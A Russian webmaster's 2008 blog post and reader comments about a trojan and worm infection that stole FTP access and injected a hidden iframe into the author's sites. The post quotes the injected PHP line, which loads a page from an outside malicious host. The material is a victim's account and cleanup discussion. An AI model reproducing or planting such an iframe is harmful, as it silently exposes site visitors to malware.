Подцепил заразу (трояна win32/Kryptik. CH и червя Win32/Pinit)
Проснулся пару часов назад, смотрю почти все сайты выдают ошибку.
Думаю, что за чёрт?
Лезу в код сайтов и вижу что приписана строчка для вставки скрытого слоя:
<?php echo '<div style="visibility:hiddеn"><ifrаmе src="http://gfdsgf333.com/in.cgi?27" width=100 height=80></ifrаmе></div>; ?>
Это всё вижу под маком, загружаю ноут с виндой в безопасном режиме и сразу за чистку.
Подцепил трояна win32/Kryptik. CH и червя Win32/Pinit. D оба свеженькие, по датам видно что как сутки — двое появились в базах антивирусных.
Самое интересное, что похоже подцепил через заражённый GIF, зайдя на вредоносный сайт IE7.
Принцип действия заразы
Анализируя то что успел натворить троян/вирь, можно сказать что он искал фтп соединения, сканировал все папки на фтп и в найденные index.* вставлял ифрейм с вредоносным кодом.
Радует: Вебмани на отдельной виртуальной машине — там почти исключена вирусная активность. ЯД тоже на месте. Троян пароли нигде не поменял, теперь это мой долг.
Вспомнил SEObotа и ещё знакомого, у которого увели 2000 вмз на днях.
Из непонятного: код появился даже на тех сайтах, пароль от которых не был сохранён в тоталкомандере (сохраняю только от аккаунтов с сателлитами). А на части сохранённых — кода нет.
Порадовал Друпал — вставка кода вызывала ошибку, так что большинство пользователей просто видели в течении 4 часов ошибку. Для тех, кто всё же пострадал — приношу извинения и рекомендую обновить антивирусные базы и проверить компьютер.
зы. Как назло, вчера вечером проверял на вирусы в 20-21 час, не помогло, уже сидели в памяти враги.
Убираем последствия
Написал нехитрый скрипт, который позволяет вычищать вставки вируса из файлов.
Подписывайтесь на rss (Что такое RSS?) чтобы оперативно получать информацию о новых записях:
Как оттестирую скрипт - выложу на блоге.
Будьте осторожны!
зы. Антивирус Nod32.
Постовые
Любишь ночную клубную жизнь? Все клубы Москвы и области. Будь в курсе вечеринок и новостей из клубной жизни.
Сайт для ценителей кофе: статьи о кофе, кофеварках, кофемашинах.
Да, с вирусами надо быть осторожнее. Как кошмарный сон представляю себе прошлые события своей чистки сайтов(((
- ответить
Опубликовано Автоинструктор (не проверено) в Пт, 05/12/2008 - 19:57.Тот же самый вирус сегодня обнаружил...
- ответить
Опубликовано Гость (не проверено) в Сб, 06/12/2008 - 19:33.Мне больше по душе - почему-то касперкий
Его главное хорошо настроить:)
- ответить
Опубликовано dert88 (не проверено) в Вс, 07/12/2008 - 13:27.епать Гога, опять по порнухе лазал ?
шутка. =) хотя в каждой шутке есть доля шутки
- ответить
Опубликовано Сыктывкарский бомж (не проверено) в Вс, 07/12/2008 - 21:11.Ослом не пользуюсь, да и какая порнуха?
Наверное вёрстку тестил в этом убогом браузере и случайно в соседней вкладке что-то открыл ((
Хотя это может быть и не причина, но заражённый гиф Нод нашёл во временных файлах именно осла.
Ну ничего, это урок будет.
Ещё чуть-чуть и для финансовых операций будет или отдельный ноутбук или отдельная виртуальная машина.
- ответить
Опубликовано GogA в Пнд, 08/12/2008 - 03:25.Такую же дрянь подцепили
- ответить
Опубликовано Гость (не проверено) в Пнд, 08/12/2008 - 14:54.у меня не только в файле index была добавлена эта строчка, но и в файле /includes/home.php.
- ответить
Опубликовано EASIER (не проверено) в Пнд, 08/12/2008 - 15:42.Ближе к ночи выложу скрипт, как бороться с последствиями шуршания по фтп от этого червя.
- ответить
Опубликовано GogA в Пнд, 08/12/2008 - 18:10.жду скрипта!!! Pinit на 4-х машинах, даже негде взять чистый user32.dll!
- ответить
Опубликовано welder (не проверено) в Пт, 12/12/2008 - 12:05.Скрипт для чистки фтп, пока только через почту - нужно, пишите.
- ответить
Опубликовано GogA в Ср, 17/12/2008 - 02:38.GogA, оправь, пж, на gazonos@gmail.com, а то нод эти вирусы определяет в мр3 и удаляет. а хочется почистить файлы и послушать.
- ответить
Опубликовано Гость (не проверено) в Втр, 23/02/2010 - 11:21.http://gogolev.net/node/94
Опубликована уже запись, с инструкцией как чистить пострадавшие файлы.
- ответить
Опубликовано GogA в Ср, 24/02/2010 - 10:36.Фигня, а не троян...
Помница смотрел исходники полиморфного вируса на php - вот это реальное веселье :) А если хреново права настроены на серваке, то и веселье хостеру и всем пользователям хостинга.
- ответить
Опубликовано KCEOH (не проверено) в Пнд, 08/12/2008 - 23:12.Писец, скоро в туалетную бумагу и в зубочистки вирусы встраивать начнут. Как жить? =)
- ответить
Опубликовано Роман (не проверено) в Втр, 09/12/2008 - 23:56.Win32/Pinit - эта гадость не удаляется.... я уже отчаялась.... после нее перестали принтеры работать!!
- ответить
Опубликовано Александра (не проверено) в Чт, 11/12/2008 - 01:19.Страшная гатость энти вирусы... На локальной машине каспер и нод сравнивали... после каспера нод не нашел ничего, а вот после нода каспер одну заразу откапал. вот так вот.
ЗЫ. Без разницы какой антивирь, базы свежие всегда должны быть.
- ответить
Опубликовано Самарский бомж (не проверено) в Пнд, 15/12/2008 - 09:04.Ещё чуть-чуть и для финансовых операций будет или отдельный ноутбук или отдельная виртуальная машина.
По хорешему не надо ждать этиъ еще чуть чуть. Просто может так чтать, что после чуть чуть денег на отдельный ноутбук уже н ебудет. :) Просто так, заметка... :)
- ответить
Опубликовано Vetroff (не проверено) в Втр, 16/12/2008 - 00:47.Ну давно уже народ так поступает, кто-то кпк покупает для фин операций, кто-то сейчас берёт Asus eeePC.
Я в сторону последнего смотрю, может на НГ дед мороз подарит :)
- ответить
Опубликовано GogA в Ср, 17/12/2008 - 02:43.Использую лицензионный KIS (Kaspersky Internet Security), отличная защита, один раз мне на сайт подцепили троя, так при заходе KIS заблочил его вызов :)
- ответить
Опубликовано Мостовой Ю. Р. (не проверено) в Втр, 16/12/2008 - 03:02.А как вылечить собственно машину, помимо ликвидации последствий?
- ответить
Опубликовано CLS (не проверено) в Втр, 16/12/2008 - 09:42.Свой ноут (не рабочий), отключил от инета. Инфы там нужной почти не осталось, так что скоро формат с: ентер.
- ответить
Опубликовано GogA в Ср, 17/12/2008 - 02:41.Напишите,как виртаульной машиной пользоваться..
Статью по безопасности, так сказать.Темку подкинул :)
- ответить
Опубликовано Волжский (не проверено) в Ср, 17/12/2008 - 00:31.В Америке вот недавно вирус-спамера посадили на 7 лет. Конечно, он просто козел отпущения, но нам бы такой не помешал, как думаете?
- ответить
Опубликовано Милан (не проверено) в Пнд, 12/01/2009 - 02:16.Перед новым годом на такой влетел, точнее на 5 сразу разных.
По модерским делам форума проверял ссылки в постах - ну и.
С зачисткой вроде справился.
Но, возникло тут одно но недавно
С моей аськи прет спам, в логах ничего нет. Не могу понять как такое может быть и что главное делать то.
- ответить
Опубликовано oldvovk (не проверено) в Вс, 18/01/2009 - 04:45.А что за эксплойт такой с заражённым gif?
- ответить
Опубликовано Скачать бесплатно (не проверено) в Вс, 01/02/2009 - 22:48.Мои сайтикы частенько так вирусовали. Но виноват был не я, тогда моего хостера взламывали и все аккаунты заражали. Но у вас наверное свой сервак.
- ответить
Опубликовано NOMAD86 (не проверено) в Сб, 07/02/2009 - 10:23.Искоренить причину это одно, предполагается что это уже сделано. Тут может быть как троян так и взлом хостера.
Пост нацелен на искоренение результатов работы трояна (вставки в код страниц вредоносного кода).
- ответить
Опубликовано GogA в Пнд, 23/03/2009 - 17:45.Точно..Win32/Pinit вот эту падлу убивал
Причем на друпале сайты просто вылетели. А вот на вордпрессе на всех сайтах слетела кодировка ( судя по всему с UTF этот троян не очень дружит) на на некторых кроме ифрейма он впихнул загрузчик другого трояна - AVG так парой и ловил
- ответить
Опубликовано Бомж беглый (не проверено) в Пнд, 20/04/2009 - 00:32.У меня тоже что то подобное, но злобного вроде ничего не сделал просто блокировал загрузку сайта пока не удалила вирус
- ответить
Опубликовано Милая Женщина (не проверено) в Пт, 01/05/2009 - 15:03.С такой же фигней неделю мучался. Решил запустить полную проверку компа. Касперский нашел около 30 троянов и один вирус, несмотря на то что я ежедневно его обновляю и настройки защиты выставил максимальные.
Потом форматнул все что только можно, перезалил вордпресс, поменял все пароли, написал хостеру, чтобы он тоже там почистил.
Второй день - вроде тихо.
Вирусоделов надо в тире выставлять и лупить по ним из боевого оружия...
- ответить
Опубликовано dakozz (не проверено) в Втр, 12/05/2009 - 14:18.столкнулся с такои проблемои,этот вирус заблокировал комп и мне пришлось отправлять смс,которое стоит 150 рублеи,кому интересен код разблокировки пишите сюда
- ответить
Опубликовано Руслан (не проверено) в Сб, 28/11/2009 - 00:10.Извините, но очень глупо потакать шантажистам, только способствуете их развитию.
Полезный сайт для определения стоимости sms — http://smscost.ru/
- ответить
Опубликовано GogA в Сб, 28/11/2009 - 13:12.Руслан, подскажите на счёт кода, плийз, чтобы смс не отправлять, то же и у меня было((
- ответить
Опубликовано Гость (не проверено) в Ср, 25/08/2010 - 22:37.Во все индексы вставляла вредоносный код в конце. А потом прописала в .htaccess, что все переходы на мой сайт с поисковиков уходили на левые сайты. В день удалял по два раза. Потом понял, что вирус не на сайте а в компе. Вроде каспер стоял, ОБНОВЛЯЛСЯ падла. Доктор веб помог (curseit) - всю заразу схавал - оказывается была она в гифах (иконки скачал на свою голову)! Так что всем советую - если такая зараза, то качай curseit и используй не тотал-командер и файл-зилу - лучше сразу править в браузере (для этого я теперь использую мазилу.
Крутая капча стоит - скажи где вазял?
- ответить
Опубликовано wertyuiop (не проверено) в Пт, 09/04/2010 - 21:52.спасибо за предупреждение
- ответить
Опубликовано evgen (не проверено) в Ср, 08/09/2010 - 10:38.В клиенте ftp к паролю и логину нужно добавить несколько лишних символов, и роботы не пройдут!
- ответить
Опубликовано gala (не проверено) в Пт, 29/10/2010 - 05:52.Ловил такой же недавно! но сейчас антивирус сработал на ура!
- ответить
Опубликовано Артур (не проверено) в Пнд, 14/02/2011 - 21:02.Чорт подхватив такой вирус по4ти ввесть комп заразил.Кто может подсказать какой интивирус лутше лечит файли??
- ответить
Опубликовано Гость (не проверено) в Чт, 12/04/2012 - 16:56.спасибо что предупредили! Какой заразы сейчас только нет!
- ответить
Опубликовано Лида (не проверено) в Чт, 01/08/2013 - 17:20.Отправить комментарий